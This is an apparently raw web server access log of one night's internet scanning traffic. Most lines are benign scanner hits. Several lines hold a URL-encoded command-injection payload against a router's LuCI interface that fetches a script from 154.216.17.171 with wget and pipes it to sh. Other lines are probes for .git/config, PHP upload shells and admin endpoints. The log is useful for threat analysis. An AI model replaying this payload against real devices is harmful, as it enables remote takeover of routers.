185.224.128.84 - - [02/Sep/2024:02:58:50 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [02/Sep/2024:03:00:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
95.214.55.138 - - [02/Sep/2024:03:01:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.190.156.137 - - [02/Sep/2024:03:03:36 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [02/Sep/2024:03:07:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:03:08:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:03:10:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:03:11:43 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
71.6.232.27 - - [02/Sep/2024:03:12:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
95.214.52.167 - - [02/Sep/2024:03:12:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
206.168.34.42 - - [02/Sep/2024:03:13:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.42 - - [02/Sep/2024:03:13:40 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
206.168.34.42 - - [02/Sep/2024:03:13:40 +0200] "PRI * HTTP/2.0" 400 329 "-" "-"
185.191.126.213 - - [02/Sep/2024:03:15:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:03:16:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:03:16:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
82.177.111.26 - - [02/Sep/2024:03:17:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.191.126.213 - - [02/Sep/2024:03:20:59 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.84 - - [02/Sep/2024:03:21:46 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [02/Sep/2024:03:21:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.84 - - [02/Sep/2024:03:23:27 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.224.128.59 - - [02/Sep/2024:03:25:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.173 - - [02/Sep/2024:03:25:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:03:26:10 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
142.93.197.121 - - [02/Sep/2024:03:27:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; Android 7.0; LG-H918 Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36"
89.190.156.137 - - [02/Sep/2024:03:27:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
89.190.156.137 - - [02/Sep/2024:03:28:17 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
185.191.126.213 - - [02/Sep/2024:03:28:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:03:29:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
71.6.232.27 - - [02/Sep/2024:03:33:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
149.50.103.48 - - [02/Sep/2024:03:34:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:03:36:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.17 - - [02/Sep/2024:03:36:34 +0200] "CONNECT example.com:80 HTTP/1.1" 405 340 "-" "-"
185.224.128.17 - - [02/Sep/2024:03:36:35 +0200] "" 501 315 "-" "-"
185.224.128.59 - - [02/Sep/2024:03:36:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.84 - - [02/Sep/2024:03:38:22 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
165.232.73.237 - - [02/Sep/2024:03:38:49 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
165.232.73.237 - - [02/Sep/2024:03:38:55 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
165.232.73.237 - - [02/Sep/2024:03:39:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
89.190.156.137 - - [02/Sep/2024:03:39:55 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
141.98.11.173 - - [02/Sep/2024:03:41:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.224.128.84 - - [02/Sep/2024:03:41:36 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+-O-+http%3A%2F%2F154.216.17.171%3A88%2Ft%7Csh%3B%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.191.126.213 - - [02/Sep/2024:03:42:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
180.246.205.220 - - [02/Sep/2024:03:42:44 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
147.185.132.36 - - [02/Sep/2024:03:45:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.36 - - [02/Sep/2024:03:45:49 +0200] "\x16\x03\x01" 501 318 "-" "-"
93.174.93.12 - - [02/Sep/2024:03:47:11 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
185.242.226.10 - - [02/Sep/2024:03:48:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.191.126.213 - - [02/Sep/2024:03:48:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
93.174.93.12 - - [02/Sep/2024:03:49:20 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [02/Sep/2024:03:49:23 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
185.242.226.10 - - [02/Sep/2024:03:49:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
93.174.93.12 - - [02/Sep/2024:03:49:49 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
93.174.93.12 - - [02/Sep/2024:03:50:11 +0200] "\x16\x03\x02\x01o\x01" 501 321 "-" "-"
185.191.126.213 - - [02/Sep/2024:03:50:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:03:50:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.242.226.10 - - [02/Sep/2024:03:53:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.10 - - [02/Sep/2024:03:54:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
35.203.211.24 - - [02/Sep/2024:03:55:09 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
87.236.176.231 - - [02/Sep/2024:03:55:41 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
185.242.226.10 - - [02/Sep/2024:03:57:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.224.128.17 - - [02/Sep/2024:03:59:13 +0200] "CONNECT example.com:80 HTTP/1.1" 405 340 "-" "-"
185.224.128.17 - - [02/Sep/2024:03:59:14 +0200] "" 501 315 "-" "-"
185.242.226.10 - - [02/Sep/2024:04:00:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.224.128.59 - - [02/Sep/2024:04:01:06 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
184.105.139.68 - - [02/Sep/2024:04:01:11 +0200] "\x16\x03\x01" 501 318 "-" "-"
149.50.103.48 - - [02/Sep/2024:04:02:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.242.226.10 - - [02/Sep/2024:04:02:07 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
95.214.53.45 - - [02/Sep/2024:04:03:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.242.226.10 - - [02/Sep/2024:04:03:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
91.92.249.4 - - [02/Sep/2024:04:04:19 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36"
91.92.249.4 - - [02/Sep/2024:04:04:57 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15"
91.92.249.4 - - [02/Sep/2024:04:04:57 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36"
185.242.226.10 - - [02/Sep/2024:04:05:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
185.242.226.10 - - [02/Sep/2024:04:05:45 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
91.92.249.4 - - [02/Sep/2024:04:05:46 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.0; rv:14.0) Gecko/20100101 Firefox/14.0.1"
91.92.249.4 - - [02/Sep/2024:04:06:00 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 OPT/3.2.13"
91.92.249.4 - - [02/Sep/2024:04:06:00 +0200] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 6.1; rv:21.0) Gecko/20130401 Firefox/21.0"
95.214.53.45 - - [02/Sep/2024:04:06:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:04:10:31 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [02/Sep/2024:04:11:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
198.235.24.225 - - [02/Sep/2024:04:12:08 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.225 - - [02/Sep/2024:04:12:08 +0200] "\x16\x03\x01" 501 318 "-" "-"
198.235.24.66 - - [02/Sep/2024:04:13:25 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
89.190.156.137 - - [02/Sep/2024:04:15:08 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
66.175.213.4 - - [02/Sep/2024:04:15:35 +0200] "\x16\x03\x01" 501 318 "-" "-"
89.190.156.137 - - [02/Sep/2024:04:17:37 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
173.252.127.6 - - [02/Sep/2024:04:20:38 +0200] "GET /robots.txt HTTP/1.1" 404 327 "-" "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
185.191.126.213 - - [02/Sep/2024:04:20:55 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:04:21:24 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:04:22:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
5.196.102.64 - - [02/Sep/2024:04:23:30 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0"
172.206.141.170 - - [02/Sep/2024:04:26:35 +0200] "MGLNDD_212.91.246.86_80" 501 338 "-" "-"
172.206.141.170 - - [02/Sep/2024:04:27:06 +0200] "MGLNDD_212.91.246.80_80" 501 338 "-" "-"
172.206.141.170 - - [02/Sep/2024:04:27:12 +0200] "MGLNDD_212.91.246.84_80" 501 338 "-" "-"
172.206.141.170 - - [02/Sep/2024:04:27:18 +0200] "MGLNDD_212.91.246.88_80" 501 338 "-" "-"
52.41.4.251 - - [02/Sep/2024:04:27:47 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
172.206.141.170 - - [02/Sep/2024:04:28:15 +0200] "MGLNDD_212.91.246.89_80" 501 338 "-" "-"
172.206.141.170 - - [02/Sep/2024:04:28:30 +0200] "MGLNDD_212.91.246.85_80" 501 338 "-" "-"
172.206.141.170 - - [02/Sep/2024:04:28:32 +0200] "MGLNDD_212.91.246.81_80" 501 338 "-" "-"
172.206.141.170 - - [02/Sep/2024:04:28:45 +0200] "MGLNDD_212.91.246.82_80" 501 338 "-" "-"
89.190.156.137 - - [02/Sep/2024:04:30:37 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
147.185.132.238 - - [02/Sep/2024:04:30:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
89.190.156.137 - - [02/Sep/2024:04:30:52 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
52.41.4.251 - - [02/Sep/2024:04:31:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
149.50.103.48 - - [02/Sep/2024:04:31:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
35.92.110.115 - - [02/Sep/2024:04:32:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
185.191.126.213 - - [02/Sep/2024:04:34:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:04:35:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.128.84.112 - - [02/Sep/2024:04:40:31 +0200] "GET /aaa9 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
178.128.84.112 - - [02/Sep/2024:04:40:34 +0200] "GET /aab8 HTTP/1.1" 404 309 "-" "Mozilla/5.0 zgrab/0.x"
178.128.84.112 - - [02/Sep/2024:04:40:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
198.74.56.46 - - [02/Sep/2024:04:41:28 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
66.175.213.4 - - [02/Sep/2024:04:41:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
13.52.182.55 - - [02/Sep/2024:04:43:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
89.190.156.137 - - [02/Sep/2024:04:46:56 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
167.71.33.116 - - [02/Sep/2024:04:47:21 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.71.33.116 - - [02/Sep/2024:04:47:21 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
154.216.17.83 - - [02/Sep/2024:04:47:56 +0200] "\x16\x03\x01\x02" 501 319 "-" "-"
178.211.139.188 - - [02/Sep/2024:04:49:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.191.126.213 - - [02/Sep/2024:04:50:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:04:50:56 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
149.50.103.48 - - [02/Sep/2024:04:54:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:04:55:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [02/Sep/2024:04:56:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
95.214.53.45 - - [02/Sep/2024:04:57:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:04:58:19 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [02/Sep/2024:04:58:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
89.190.156.137 - - [02/Sep/2024:05:00:29 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
89.190.156.137 - - [02/Sep/2024:05:00:46 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
149.50.103.48 - - [02/Sep/2024:05:01:11 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [02/Sep/2024:05:02:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
89.190.156.137 - - [02/Sep/2024:05:04:11 +0200] "GET / HTTP/1.0" 200 1229 "-" "ivre-masscan/1.3 https://github.com/robertdavidgraham/"
147.185.132.201 - - [02/Sep/2024:05:04:38 +0200] "\x16\x03\x01" 501 318 "-" "-"
147.185.132.201 - - [02/Sep/2024:05:04:39 +0200] "\x16\x03\x01" 501 318 "-" "-"
178.211.139.188 - - [02/Sep/2024:05:08:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
64.62.156.23 - - [02/Sep/2024:05:10:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36"
185.191.126.213 - - [02/Sep/2024:05:10:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
74.82.47.5 - - [02/Sep/2024:05:10:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0"
34.245.16.54 - - [02/Sep/2024:05:11:46 +0200] "HEAD /spicons/apache_pb.gif HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; NetcraftSurveyAgent/1.0; +info@netcraft.com)"
64.226.115.249 - - [02/Sep/2024:05:13:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
64.226.115.249 - - [02/Sep/2024:05:13:15 +0200] "GET /odinhttpcall1725246190 HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.226.115.249 - - [02/Sep/2024:05:13:15 +0200] "POST /sdk HTTP/1.1" 404 308 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.226.115.249 - - [02/Sep/2024:05:13:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
64.226.115.249 - - [02/Sep/2024:05:13:15 +0200] "GET /HNAP1 HTTP/1.1" 404 310 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.226.115.249 - - [02/Sep/2024:05:13:15 +0200] "GET /evox/about HTTP/1.1" 404 315 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
64.226.115.249 - - [02/Sep/2024:05:13:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "-"
64.226.115.249 - - [02/Sep/2024:05:13:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
161.35.202.32 - - [02/Sep/2024:05:13:15 +0200] "GET /query?q=SHOW+DIAGNOSTICS HTTP/1.1" 404 310 "-" "Go-http-client/1.1"
161.35.201.130 - - [02/Sep/2024:05:13:15 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
134.122.86.152 - - [02/Sep/2024:05:13:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
68.183.68.147 - - [02/Sep/2024:05:13:15 +0200] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 326 "-" "Go-http-client/1.1"
164.90.178.150 - - [02/Sep/2024:05:13:15 +0200] "GET /v2/_catalog HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
165.22.91.63 - - [02/Sep/2024:05:13:15 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)"
161.35.201.130 - - [02/Sep/2024:05:13:15 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
134.122.86.152 - - [02/Sep/2024:05:13:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
134.122.86.152 - - [02/Sep/2024:05:13:15 +0200] "\x16\x03\x01" 501 318 "-" "-"
164.90.182.246 - - [02/Sep/2024:05:13:15 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
52.76.71.100 - - [02/Sep/2024:05:13:16 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Go-http-client/1.1"
185.224.128.17 - - [02/Sep/2024:05:13:28 +0200] "CONNECT example.com:80 HTTP/1.1" 405 340 "-" "-"
185.224.128.17 - - [02/Sep/2024:05:13:29 +0200] "" 501 315 "-" "-"
149.50.103.48 - - [02/Sep/2024:05:19:52 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:05:28:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
167.99.64.168 - - [02/Sep/2024:05:28:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.99.64.168 - - [02/Sep/2024:05:28:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
167.99.64.168 - - [02/Sep/2024:05:28:03 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.64.168 - - [02/Sep/2024:05:28:03 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
167.99.64.168 - - [02/Sep/2024:05:28:04 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
167.99.64.168 - - [02/Sep/2024:05:28:04 +0200] "GET /t4 HTTP/1.1" 404 307 "-" "Mozilla/5.0"
167.99.64.168 - - [02/Sep/2024:05:28:04 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.64.168 - - [02/Sep/2024:05:28:05 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.64.168 - - [02/Sep/2024:05:28:05 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.64.168 - - [02/Sep/2024:05:28:05 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.99.64.168 - - [02/Sep/2024:05:28:06 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
52.53.249.28 - - [02/Sep/2024:05:28:43 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36"
149.50.103.48 - - [02/Sep/2024:05:29:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [02/Sep/2024:05:30:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
178.211.139.188 - - [02/Sep/2024:05:33:04 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
149.50.103.48 - - [02/Sep/2024:05:35:23 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
